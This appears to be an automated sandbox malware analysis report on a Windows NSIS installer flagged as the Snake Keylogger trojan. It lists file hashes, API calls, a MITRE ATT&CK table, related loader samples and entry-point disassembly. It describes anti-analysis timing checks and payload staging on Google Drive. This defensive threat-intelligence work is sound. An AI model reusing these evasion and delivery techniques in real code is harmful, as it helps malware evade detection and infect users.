      Source: Yara matchFile source: 00000002.00000002.3502635941.0000000003614000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2354906620.0000000006A84000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeAPI/Special instruction interceptor: Address: 73E329E
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeAPI/Special instruction interceptor: Address: 3F7329E
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeRDTSC instruction interceptor: First address: 73A0F05 second address: 73A0F05 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4F98507066h 0x00000008 cmp ecx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeRDTSC instruction interceptor: First address: 3F30F05 second address: 3F30F05 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4F98D7ABC6h 0x00000008 cmp ecx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe TID: 500Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618336510.00000000068CB000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.00000000068C6000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591610194.00000000068CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx8
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeAPI call chain: ExitProcess graph end nodegraph_0-4754
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeAPI call chain: ExitProcess graph end nodegraph_0-4755
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeProcess created: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"Jump to behavior
      Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exeCode function: 0_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F6A
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 21 Security Software Discovery | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 23 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| Source | Detection | Scanner | Label |
| --- | --- | --- | --- |
| TEC-SPC-94.03.60.175.07.exe | 58% | ReversingLabs | Win32.Trojan.SnakeKeylogger |

| Source | Detection | Scanner | Label |
| --- | --- | --- | --- |
| C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll | 0% | ReversingLabs | |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| drive.google.com | 172.217.19.174 | true | false | | high |
| drive.usercontent.google.com | 142.250.181.1 | true | false | | high |
| s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| https://www.google.com | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://drive.usercontent.google.com/ | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://apis.google.com | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://drive.usercontent.google.com/0E | TEC-SPC-94.03.60.175.07.exe | false | | high |
| http://nsis.sf.net/NSIS_ErrorError | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://translate.google.com/translate_a/element.js | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://drive.usercontent.google.com/N9p5ty5miFE834NBt4YyP-e | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://drive.google.com/ | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://drive.google.com/Gj | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://drive.google.com/gjh | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://drive.google.com/wjx | TEC-SPC-94.03.60.175.07.exe | false | | high |
| https://drive.usercontent.google.com/hE | TEC-SPC-94.03.60.175.07.exe | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 142.250.181.1 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
| 172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false |
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1576272
                                    Start date and time:2024-12-16 17:56:06 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 56s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:6
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:TEC-SPC-94.03.60.175.07.exe
                                    Detection:MAL
                                    Classification:mal68.troj.evad.winEXE@3/10@2/2
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 90%
                                    • Number of executed functions: 48
                                    • Number of non-executed functions: 76
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target TEC-SPC-94.03.60.175.07.exe, PID 4420 because there are no executed function
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: TEC-SPC-94.03.60.175.07.exe
| Time | Type | Description |
| --- | --- | --- |
| 11:57:38 | API Interceptor | 18x Sleep call for process: TEC-SPC-94.03.60.175.07.exe modified |
                                    No context
Match: s-part-0035.t-0009.t-msedge.net

| Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- |
| Smple_Order-048576744759475945.xls | malicious | Unknown | 13.107.246.63 |
| Document.xla.xlsx | malicious | Unknown | 13.107.246.63 |
| Sample_Order_000000991.xls | malicious | Unknown | 13.107.246.63 |
| BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xls | malicious | Unknown | 13.107.246.63 |
| Smple_Order-048576744759475945.xls | malicious | Unknown | 13.107.246.63 |
| Document.xla.xlsx | malicious | Unknown | 13.107.246.63 |
| Sample_Order_000000991.xls | malicious | Unknown | 13.107.246.63 |
| BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xls | malicious | Unknown | 13.107.246.63 |
| JIKJCBEX.exe | malicious | LummaC | 13.107.246.63 |
| LKKWDUFD.exe | malicious | Unknown | 13.107.246.63 |
                                    No context
Match: 37f463bf4616ecd445d4a1937da06e19

| Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- |
| pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 142.250.181.1, 172.217.19.174 |
| dZKPE9gotO.exe | malicious | Vidar | 142.250.181.1, 172.217.19.174 |
| InvoiceNr274728.pdf.lnk | malicious | LummaC | 142.250.181.1, 172.217.19.174 |
| nB52P46OJD.exe | malicious | Vidar | 142.250.181.1, 172.217.19.174 |
| file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 142.250.181.1, 172.217.19.174 |
| PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 142.250.181.1, 172.217.19.174 |
| njrtdhadawt.exe | malicious | Stealc, Vidar | 142.250.181.1, 172.217.19.174 |
| T0x859fNfn.exe | malicious | Vidar | 142.250.181.1, 172.217.19.174 |
| InvoiceNr274728.pdf.lnk | malicious | Unknown | 142.250.181.1, 172.217.19.174 |
| A6IuJ5NneS.lnk | malicious | LummaC | 142.250.181.1, 172.217.19.174 |
Match: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll

| Associated Sample Name / URL | Detection | Threat Name |
| --- | --- | --- |
| Purchase-Order27112024.scr.exe | malicious | Remcos, GuLoader |
| 563299efce875400a8d9b44b96597c8e-sample (1).zip | malicious | Unknown |
| debit-note-19-08-dn-2024.exe | malicious | GuLoader |
| debit-note-19-08-dn-2024.exe | malicious | GuLoader |
| HE9306_AWBLaser_Single240812144358.exe | malicious | GuLoader |
| HE9306_AWBLaser_Single240812144358.exe | malicious | GuLoader |
| z41_EX24-772_24.exe | malicious | GuLoader |
| z41_EX24-772_24.exe | malicious | GuLoader |
| _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe | malicious | FormBook, GuLoader |
| _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe | malicious | GuLoader |
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):45
                                                        Entropy (8bit):4.7748605961854445
                                                        Encrypted:false
                                                        SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                        MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                        SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                        SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                        SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1209210
                                                        Entropy (8bit):3.388632053264602
                                                        Encrypted:false
                                                        SSDEEP:6144:GP7npYBciqq2hO/JcKBk4JMY5mTXWwxv4QH5m/o/MWV9gZrp0AJ2aJ4aKh:GP7C1Bk4krWw94QH4/o0WMcPh
                                                        MD5:848CBF8E8503F5DCE77C15B6EAE975B8
                                                        SHA1:E29E73856E80705B12D535D9F5711FB387957EE4
                                                        SHA-256:B903E3DF94CA281294E2316738C3C10E3F93529C715D3796AA2081E790EF5983
                                                        SHA-512:4CCCE79C6D952029B8F5AB71C719E71469434FD6AD539D187FE18E031F0D0169616D96B5A4F53E9F30F8EA4FB908E70F6F44943C6942E0BB14CA4622F8D56C3A
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.656006343879828
                                                        Encrypted:false
                                                        SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                        MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                        SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                        SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                        SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: Purchase-Order27112024.scr.exe, Detection: malicious
                                                        • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious
                                                        • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious
                                                        • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious
                                                        • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious
                                                        • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious
                                                        • Filename: z41_EX24-772_24.exe, Detection: malicious
                                                        • Filename: z41_EX24-772_24.exe, Detection: malicious
                                                        • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious
                                                        • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious
                                                        Reputation:moderate, very likely benign file
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):28
                                                        Entropy (8bit):4.110577243331642
                                                        Encrypted:false
                                                        SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                        MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                        SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                        SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                        SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:[Access]..Setting=Disabled..
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):207998
                                                        Entropy (8bit):1.2479248406208852
                                                        Encrypted:false
                                                        SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                        MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                        SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                        SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                        SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):27598
                                                        Entropy (8bit):4.570583675091086
                                                        Encrypted:false
                                                        SSDEEP:384:u19PboBFKSqS40INMIETbU9nHCa5b8ICaFDlnC/8pf+G6FPEd:uTPbF9mIGW98I/+JGqP6
                                                        MD5:23E566226854C7E77201E9D814ACAF99
                                                        SHA1:A801A3BBCAC3CB626EA4EBD1AC14554134CE8802
                                                        SHA-256:9EA4CFCE59BC6444A4FC09F23C0249625F395A802D48DFBAEBEDEE6FCC3117D2
                                                        SHA-512:FC026879C1DB8AF906720FB54796FDF8E6B31AE89BB5516FA6CB4A2D6ED61729274B4974627AC7406E72BAD69F8717019FC7F1826B25387588089E25D363D88E
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):301225
                                                        Entropy (8bit):7.52936284400769
                                                        Encrypted:false
                                                        SSDEEP:6144:qpYBciqq2hO/JcKBk4JMY5mTXWwxv4QH5m/o/MW2:h1Bk4krWw94QH4/o0W2
                                                        MD5:36B62BD81B795DDB447F1F7FEF6911CE
                                                        SHA1:55957B36A367990AC390D84FE18520B395740D9D
                                                        SHA-256:4ECF52E1007A0245DA1F6841CFF28A48B69C56D59221FFE20A0736C911C8B615
                                                        SHA-512:16F793819A6C55F8A7CEF439B517648AED1EE31429D120E64B18D8FA66AE80B79CD879F3DA78E33B7F9F3151516D52B02F4F6D53AE8A56661EE5247CA2A20C78
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):443489
                                                        Entropy (8bit):1.2463028275519636
                                                        Encrypted:false
                                                        SSDEEP:768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
                                                        MD5:913964ACDFFFA24344A401D48E08C653
                                                        SHA1:EE1E0AC79DA12D6439F9DF5B865347647473642A
                                                        SHA-256:B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
                                                        SHA-512:2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):209062
                                                        Entropy (8bit):1.2469617066336303
                                                        Encrypted:false
                                                        SSDEEP:768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
                                                        MD5:607886D87859E45164D2959809AB5367
                                                        SHA1:4E86EB72512D4C9BE32304E3A12B499D6A86084B
                                                        SHA-256:A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
                                                        SHA-512:A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                        Category:dropped
                                                        Size (bytes):898
                                                        Entropy (8bit):3.504861469259323
                                                        Encrypted:false
                                                        SSDEEP:12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMRz8RMJsW+slmYalzJCN85v4t2YZ2:8QudO/9Q6jd9a6/y3Nr24qy
                                                        MD5:92A17BC4BBB82ECB9494367095582DA2
                                                        SHA1:88D72BE0847424385217F00B79737EFFCB6C433A
                                                        SHA-256:F4AEBD33981F6EE35A4A7DEB9DC9E0C41868497B94E76A77F0BE2EE0D2194DA7
                                                        SHA-512:EB82976CCA3A8F1ACDE9B77ECB709AD4DA9EAAC9F460BBD4D90A00208F6AE29579FF041BA40334FFE8B898C58590BEB3EECC369EEBD023E45BAAE0DB941BB8DB
                                                        Malicious:false
                                                        Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.I.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.885499918962077
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:TEC-SPC-94.03.60.175.07.exe
                                                        File size:534'840 bytes
                                                        MD5:01b2b1469623862352f36c9a1d2ca1d5
                                                        SHA1:297d178ed13293b4ca95c731c08bef11266c4998
                                                        SHA256:72a691eae6f31fd6db1c1a5453ac5aad4b8b85d2747c5e668e761eb2e010d02a
                                                        SHA512:5affc393eea3499b31837f155de186b8f0d740f5a7cd49be27398448dbff4aef3e09dce90582546f741717f153e79561656cf35fa6101da65df49838788ba674
                                                        SSDEEP:12288:XRV78CR08V3IJEq6ZZTkwa81KuUG70SdlmgT0R7RR:Iw08V3iT8D1YM/6wy7RR
                                                        TLSH:D5B423447BE1E412C9E68E310FD3DAA9EAA8FD36483106865B2C2DBF79747C1453E391
                                                        Icon Hash:0714262e34390f06
                                                        Entrypoint:0x40335a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                        Instruction
                                                        sub esp, 000002D8h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        xor ebp, ebp
                                                        pop esi
                                                        mov dword ptr [esp+18h], ebp
                                                        mov dword ptr [esp+10h], 00409230h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [00407034h]
                                                        push 00008001h
                                                        call dword ptr [004070BCh]
                                                        push ebp
                                                        call dword ptr [004072ACh]
                                                        push 00000009h
                                                        mov dword ptr [004292B8h], eax
                                                        call 00007F4F990CF5CAh
                                                        mov dword ptr [00429204h], eax
                                                        push ebp
                                                        lea eax, dword ptr [esp+38h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebp
                                                        push 004206A8h
                                                        call dword ptr [0040717Ch]
                                                        push 0040937Ch
                                                        push 00428200h
                                                        call 00007F4F990CF235h
                                                        call dword ptr [00407134h]
                                                        mov ebx, 00434000h
                                                        push eax
                                                        push ebx
                                                        call 00007F4F990CF223h
                                                        push ebp
                                                        call dword ptr [0040710Ch]
                                                        push 00000022h
                                                        mov dword ptr [00429200h], eax
                                                        pop edi
                                                        mov eax, ebx
                                                        cmp word ptr [00434000h], di
                                                        jne 00007F4F990CC6B9h
                                                        mov esi, edi
                                                        mov eax, 00434002h
                                                        push esi
                                                        push eax
                                                        call 00007F4F990CEC73h
                                                        push eax
                                                        call dword ptr [00407240h]
                                                        mov ecx, eax
                                                        mov dword ptr [esp+1Ch], ecx
                                                        jmp 00007F4F990CC7ABh
                                                        push 00000020h
                                                        pop edx
                                                        cmp ax, dx
                                                        jne 00007F4F990CC6B9h
                                                        inc ecx
                                                        inc ecx
                                                        cmp word ptr [ecx], dx
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
